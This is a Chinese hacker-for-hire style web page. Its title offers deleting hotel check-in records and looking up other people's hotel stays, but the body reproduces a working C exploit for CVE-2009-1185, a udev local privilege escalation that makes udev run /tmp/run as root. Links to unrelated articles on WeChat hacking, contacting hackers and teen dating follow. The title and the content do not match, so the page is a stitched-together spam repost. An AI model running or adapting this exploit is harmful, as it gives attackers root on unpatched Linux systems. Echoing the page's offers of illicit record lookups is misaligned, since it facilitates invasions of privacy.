找黑客平台

怎么删除酒店开房记录 如何查询他人在酒店和宾

访客4年前黑客文章933

* cve-2009-1185.c** udev < 141 Local Privilege Escalation Exploit* Jon Oberheide * http://jon.oberheide.org** Information:** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185** udev before 1.4.1 does not verify whether a NETLINK message originates* from kernel space, which allows local users to gain privileges by sending* a NETLINK message from user space. ** Notes:** An alternate version of kcope's exploit. This exploit leverages the* 95-udev-late.rules functionality that is meant to run arbitrary commands* when a device is removed. A bit cleaner and reliable as long as your* distro ships that rule file. The exploit will execute /tmp/run as root* so throw whatever payload you want in there.** Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,* usually is the udevd PID minus 1) as argv[1].*/#include #include #include #include #include #include #include #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif int main(int argc, char **argv) { int sock; char *mp; char message[4096]; struct msghdr msg; struct iovec iovector; struct sockaddr_nl address; memset(&address, 0, sizeof(address)); address.nl_family = AF_NETLINK; address.nl_pid = atoi(argv[1]); address.nl_groups = 0; msg.msg_name = (void*)&address; msg.msg_namelen = sizeof(address); msg.msg_iov = &iovector; msg.msg_iovlen = 1; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &address, sizeof(address)); mp = message; mp += sprintf(mp, "a@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1; iovector.iov_base = (void*)message; iovector.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } // milw0rm.com [2009-04-30]

返回列表

上一篇:小学生早恋上床应该怎么办(康老师指导应对学生恋爱)

下一篇:初二女生早恋了应该怎么办(唐老师指导解答孩子早恋)

相关文章

微信遭遇黑客(微信遇到黑客怎么办)

微信遭遇黑客(微信遇到黑客怎么办)

本文目录一览: 1、微信被黑客入侵换手机有用吗 2、微信被黑客入侵了怎么办? 3、微信怎么防止黑客入侵? 微信被黑客入侵换手机有用吗 一般是有用的,改微信密码。如果被入侵取消所有应用和浏览器...

手机丢失 微信登录不上怎么办

请您登录微信官网()点击“提示在新设备登录,需要验证手机”进入关闭帐号保护页面,通过提示申请关闭帐号保护(微信号必须绑定。 不应该吧,如果是密码登录的话应该可以登上,但是如果你以前的手机是微信自动登录...

如何能联系上黑客「在哪可以找到黑客高手」

  【环球网报道 记者 侯佳欣】当地时间5月17日,特斯拉CEO埃隆·马斯克发布了这样一则推文:“服下红色药丸吧。”他还在推文最后配上了一个红玫瑰的表情符号。↓马斯克没有在推文中给出更多解释。这则推文...

现在二手苹果4多少钱,现在二手苹果x多少钱

  iPhone X分为差异的版本,按照每一个版本的内存和机能纷歧样,报价也林家宇会有所差异。 GPU搭载了由苹几多钱果设计的全新图形处理惩罚芯片,相较A10的图像处理惩罚与渲染本领跨越30。   今...

唐探2女黑客腿图片(唐探2黑客叫什么名字)

唐探2女黑客腿图片(唐探2黑客叫什么名字)

本文目录一览: 1、如何评价尚语贤在《唐人街探案2》中的造型? 2、唐人街探案2当中的女黑客KIKO是谁演的 3、《唐人街探案》二里那个女黑客是谁演的? 4、《唐人街探案2》女黑客是谁?...

【车票】抢不到票的同砚一定试试–离线抢票

好几个网上的同伙通过这款网站搞到卧铺了,没有买到票的不敢保证100%买到,不外可以试试。 什么是离线抢票? 类似离线下载,用户把义务提交到服务器,由服务器帮你一直的刷新,保持7×16小时抢票。...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.